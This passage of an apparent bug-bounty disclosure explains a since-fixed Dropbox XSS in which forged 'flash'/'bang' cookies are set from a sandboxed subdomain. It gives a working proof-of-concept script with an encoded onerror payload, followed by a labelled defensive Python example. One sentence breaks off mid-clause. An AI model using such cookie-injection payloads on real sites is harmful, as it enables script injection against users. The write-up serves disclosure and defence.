dl-web.dropbox.com, so we cannot easily steal any other user’s session.
What I want to point out here is that we can set any cookie for the global domain (.dropbox.com), since the sandboxed domain is also under the global domain, even though we cannot directly access cookies on the main subdomain (www.dropbox.com). I thought it might be possible to make something happen on
I found a nice feature: Flash. It is a pop-up message that appears for 1-2 seconds and is triggered by cookies. Once the cookies "flash" and "bang" are set, it draws a small message box containing the text stored in the cookie "flash" and checks the integrity of "flash" against the cookie "bang". The "bang" looks like an HMAC of "flash". So I need to find a correct "bang" value for my custom "flash".
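How a signed flash-message cookie like the one described above is checked on the server, and the two defences that break this chain (escaping the message on output so a correctly signed message still cannot carry markup, and scoping the cookies with the `__Host-` prefix so a sibling subdomain cannot set them on the parent domain), as an added Python example that is not Dropbox's code. The HMAC-SHA256/base64 tag format, the `SECRET_KEY`, the constructed sample message and all function names are assumptions; the page only says "bang" looks like an HMAC of "flash".

```python
import base64
import hashlib
import hmac
import html
from typing import Dict, List, Optional
from urllib.parse import quote, unquote

# Constructed secret for this example; a real deployment keeps it in a secret
# store and never exposes the key, or a signing oracle, to untrusted input.
SECRET_KEY = b"example-flash-signing-key"


def sign_flash(message: str) -> str:
    """Compute the 'bang' tag for a flash message.

    Hypothetical scheme: urlsafe-base64 of HMAC-SHA256 over the raw message bytes.
    """
    digest = hmac.new(SECRET_KEY, message.encode("utf-8"), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).decode("ascii")


def verify_and_render_flash(cookies: Dict[str, str]) -> Optional[str]:
    """Verify the flash/bang pair and return escaped HTML, or None if it fails.

    Both cookies are attacker-influenced (any subdomain can set them on the
    parent domain), so the message is treated as data even after the tag checks.
    """
    raw = cookies.get("flash")
    tag = cookies.get("bang")
    if raw is None or tag is None:
        return None
    message = unquote(raw)  # cookie values travel percent-encoded
    # Constant-time comparison on bytes: a plain == leaks timing, and comparing
    # str objects raises TypeError if the attacker supplies non-ASCII characters.
    expected = sign_flash(message).encode("ascii")
    if not hmac.compare_digest(expected, tag.encode("utf-8")):
        return None
    # Integrity is not authorisation to render markup: escape before output.
    return f'<div class="flash">{html.escape(message)}</div>'


def flash_set_cookie_headers(message: str) -> List[str]:
    """Build Set-Cookie headers that a sibling subdomain cannot forge or override.

    Browsers only accept a __Host- cookie when it is Secure, has Path=/ and
    carries no Domain attribute, so it is bound to this exact host and cannot be
    planted from dl-web.dropbox.com-style sandboxed origins.
    """
    attrs = "Path=/; Secure; HttpOnly; SameSite=Lax"
    return [
        f"__Host-flash={quote(message, safe='')}; {attrs}",
        f"__Host-bang={sign_flash(message)}; {attrs}",
    ]


if __name__ == "__main__":
    # Constructed sample: a message that contains markup, as an attacker would craft.
    sample = "ok:<b>Device unlinked</b> successfully."
    print(flash_set_cookie_headers(sample))
    print(verify_and_render_flash({"flash": sample, "bang": sign_flash(sample)}))
    print(verify_and_render_flash({"flash": sample + "!", "bang": sign_flash(sample)}))
```

The escape on output is the fix that actually removes the injection; the `__Host-` scoping removes the cookie-planting vector described earlier in the post, and a CSP is a third layer that, as noted below, did not help on every browser at the time.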
Now, I can make any flash messages with any text.
After uploading an HTML file that sets the malicious cookies obtained from the device unlink function, make the victim click your page. The flash message will appear and attack the victim when the victim opens a Dropbox web page.
```html
<script>
document.cookie="bang=QUFEZGthYS1CaTNfWUpYcDUwdjNxemVHSHlhSHJkU3BEdnhKRUxOZVZ3b2ZoUQ%3D%3D; Domain=dropbox.com; Path=/;";
document.cookie="flash=b2s6PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik%2BIHVubGlua2VkIHN1Y2Nlc3NmdWxseS4%3D; Domain=dropbox.com; Path=/";
location.href="https://dropbox.com/forgot";
</script>
```
There is a CSP, but the script is still executed on IE or Safari.
2015/05/02 Fixed, a bounty of $1,331